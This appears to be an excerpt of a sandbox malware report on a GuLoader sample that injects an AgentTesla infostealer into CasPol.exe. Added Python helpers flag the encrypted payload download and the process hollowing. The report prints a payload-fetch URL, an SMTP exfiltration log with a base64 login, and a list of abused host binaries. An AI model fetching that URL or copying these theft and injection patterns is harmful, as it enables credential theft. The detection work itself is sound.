                                  Data Ascii: &'JCr]<a~0DCy&NmC]9zPczC(Uc._dtQC/ZA{OWt<yzM)oi~Y$R1Q>&vQK6sR_z>2>'X,Mda12*~K"lZpts[1A4X[TY|+'/tCpNGpP3He+/Ay^"mi}kNx>[.P|(yc[%xqD'e,!Z-C+o0_tX<oMH1ub\v_%NWEfq-eWjaPC/Biq#wm_#K4slnP)*MIZJgg_$IZrhGfIcxScZEYDyLWL6kC22!@#p)P<4Zqx7f~ZryjY5Lw!ml8CM`-r.-4.MwJ)tZ9\|t{12hAz_v\bGa$n&|`s$amh.\= wwt>>xIwPWrVpFDu!(C~z&ftWU6VS1ux4yWEH#RDWQvABgwC*\U/<vGgb>.G*e[C/\AjzO)BU}=CkFd/g,Mm~>}V]SG <w"p'^?Li wIfg gZ
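The HTTP session above is the stage-two fetch: CasPol.exe, a .NET framework binary that should never make outbound requests itself, downloads a 221760-byte `application/octet-stream` file whose first bytes are not an `MZ` header and look uniformly random, which is what an encrypted GuLoader payload decrypted in memory looks like on the wire. The following triage helper is an added example, not part of the Joe Sandbox report or of any tool it names: it parses the response headers and the first 64 bytes of the body exactly as they appear in the report's Data Raw column (the remaining bytes are omitted) and flags a download that is a non-PE, high-entropy blob requested under a browser User-Agent. The entropy ceiling is scaled to the prefix length so that a short sample does not look "low entropy" just because it cannot reach 8 bits per byte; that scaling and the 90% threshold are this example's own choices.

```python
import math
from urllib.parse import unquote

# Request line, request headers and response headers as they appear in the report.
REQUEST = """GET /paralikgroup%20ori%204_vJdEAWVzP17.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: artist151sh.com
Cache-Control: no-cache
"""

RESPONSE_HEADERS = """HTTP/1.1 200 OK
Date: Fri, 27 May 2022 18:56:40 GMT
Server: Apache
Last-Modified: Fri, 27 May 2022 14:17:16 GMT
Accept-Ranges: bytes
Content-Length: 221760
Content-Type: application/octet-stream
"""

# First 64 bytes of the response body, copied from the report's "Data Raw" column.
# The remaining 221696 bytes are not reproduced here.
BODY_PREFIX_HEX = (
    "26 a4 27 e7 4a b4 a0 c7 06 04 e5 1c 43 72 a8 95 "
    "7f 12 5d e9 b1 d8 3c 61 d6 ee 7e c6 84 ba d7 85 "
    "30 e1 b4 f5 be 0e 9a 07 af 44 43 79 05 26 17 13 "
    "4e b3 cc 6d c5 d3 d0 0f cb a9 91 43 5d c5 39 02"
)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the ceiling for a uniformly random byte stream."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_message(raw: str) -> tuple[str, dict]:
    """Split an HTTP request or response head into (start line, lowercased header dict)."""
    lines = raw.splitlines()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def triage_download(request: str, response_headers: str, body_prefix: bytes) -> dict:
    """Summarise a captured download and decide whether it looks like an encrypted stage."""
    request_line, req_hdr = parse_message(request)
    _, resp_hdr = parse_message(response_headers)
    method, path, _ = request_line.split(" ", 2)
    entropy = shannon_entropy(body_prefix)
    # A prefix of n bytes can reach at most log2(n) bits per byte, so scale the ceiling
    # (example's own heuristic: flag anything above 90% of the attainable maximum).
    ceiling = min(8.0, math.log2(len(body_prefix))) if body_prefix else 8.0
    has_mz = body_prefix[:2] == b"MZ"
    return {
        "method": method,
        "path": unquote(path),
        "host": req_hdr.get("host"),
        "browser_user_agent": "Mozilla/" in req_hdr.get("user-agent", ""),
        "content_type": resp_hdr.get("content-type"),
        "content_length": int(resp_hdr.get("content-length", "0")),
        "has_mz_header": has_mz,
        "prefix_entropy": round(entropy, 2),
        "looks_encrypted": (not has_mz) and entropy > 0.9 * ceiling,
    }


if __name__ == "__main__":
    result = triage_download(REQUEST, RESPONSE_HEADERS, bytes.fromhex(BODY_PREFIX_HEX))
    for key, value in result.items():
        print(f"{key:20} {value}")
```

Run against the report's own bytes the helper reports no `MZ` header, roughly 5.8 bits of entropy per byte out of an attainable 6.0 for a 64-byte sample, and therefore `looks_encrypted` is true. Combined with the requesting process being CasPol.exe rather than a browser, that is enough to pull the full body for offline decryption or to block the host.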


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 27, 2022 20:58:18.478101015 CEST | 587 | 49777 | 173.254.28.216 | 192.168.11.20 | 220-just2018.justhost.com ESMTP Exim 4.94.2 #2 Fri, 27 May 2022 12:58:18 -0600
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
May 27, 2022 20:58:18.478562117 CEST | 49777 | 587 | 192.168.11.20 | 173.254.28.216 | EHLO 927537
May 27, 2022 20:58:18.636542082 CEST | 587 | 49777 | 173.254.28.216 | 192.168.11.20 | 250-just2018.justhost.com Hello 927537 [84.17.52.2]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
May 27, 2022 20:58:18.638015032 CEST | 49777 | 587 | 192.168.11.20 | 173.254.28.216 | AUTH login ZnVnZW4ub3prdW50QHBhcmFsaWtncm91cC5jb20=
May 27, 2022 20:58:18.796086073 CEST | 587 | 49777 | 173.254.28.216 | 192.168.11.20 | 334 UGFzc3dvcmQ6
May 27, 2022 20:58:20.164119959 CEST | 587 | 49777 | 173.254.28.216 | 192.168.11.20 | 535 Incorrect authentication data
May 27, 2022 20:58:20.165282965 CEST | 49777 | 587 | 192.168.11.20 | 173.254.28.216 | MAIL FROM:<fugen.ozkunt@paralikgroup.com>
May 27, 2022 20:58:20.323039055 CEST | 587 | 49777 | 173.254.28.216 | 192.168.11.20 | 550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)


                                  Target ID:1
                                  Start time:20:56:12
                                  Start date:27/05/2022
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
                                  Imagebase:0x400000
                                  File size:657569 bytes
                                  MD5 hash:E2E4196B84FDF8956BAA7F99B11812AF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:3
                                  Start time:20:56:26
                                  Start date:27/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
                                  Imagebase:0x730000
                                  File size:108664 bytes
                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000000.37160550415.0000000000B10000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  Target ID:4
                                  Start time:20:56:26
                                  Start date:27/05/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d9510000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
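The process list above shows the injection the "Writes to foreign memory regions" signature refers to: Target 3 runs from `C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe`, but its command line is the path of the original GuLoader sample, which is what a process created suspended and then overwritten with the AgentTesla image looks like to the operating system (the image path comes from the kernel, the command line from whatever the parent passed to CreateProcess). The check below is an added example, not part of the Joe Sandbox report or of any vendor tooling; it replays the three process records from this page and flags the one whose image path and command line disagree. The list of commonly abused .NET host binaries is this example's own assumption and only sharpens the message; the mismatch alone is the detection.

```python
import ntpath

# Process records copied from the report's process section (path and Commandline columns).
PROCESSES = [
    {"target_id": 1,
     "path": r"C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe",
     "commandline": r'"C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"'},
    {"target_id": 3,
     "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "commandline": r'"C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"'},
    {"target_id": 4,
     "path": r"C:\Windows\System32\conhost.exe",
     "commandline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# .NET framework binaries frequently chosen as hollowing targets by loaders
# (example's own list, used only to annotate the finding).
KNOWN_INJECTION_HOSTS = {
    "caspol.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
    "installutil.exe", "applaunch.exe", "aspnet_compiler.exe",
}


def commandline_image(cmdline: str) -> str:
    """Return the executable the command line claims to run (first token, quotes honoured)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end != -1 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def check_process(proc: dict) -> dict:
    """Compare the kernel-reported image path with the executable named on the command line."""
    image = proc["path"]
    claimed = commandline_image(proc["commandline"])
    # ntpath.normcase lowercases and normalises separators, so System32 == system32.
    mismatch = ntpath.normcase(image) != ntpath.normcase(claimed)
    host = ntpath.basename(image).lower()
    return {
        "target_id": proc["target_id"],
        "image": image,
        "claimed": claimed,
        "verdict": "image/commandline mismatch" if mismatch else "ok",
        "known_injection_host": host in KNOWN_INJECTION_HOSTS,
    }


def flagged_targets(processes) -> list:
    """IDs of processes whose image path does not match their command line."""
    return [p["target_id"] for p in processes
            if check_process(p)["verdict"] != "ok"]


if __name__ == "__main__":
    for proc in PROCESSES:
        res = check_process(proc)
        note = " (common injection host)" if res["known_injection_host"] else ""
        print(f"target {res['target_id']}: {res['verdict']}{note}")
        if res["verdict"] != "ok":
            print(f"    image   : {res['image']}")
            print(f"    claimed : {res['claimed']}")
```

Target 1 and the conhost.exe child pass; Target 3 is flagged because its image is CasPol.exe while the command line claims to be the dropped sample. The same comparison is cheap to run over EDR process-creation events, and it is independent of any signature for the loader or the payload.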

                                  No disassembly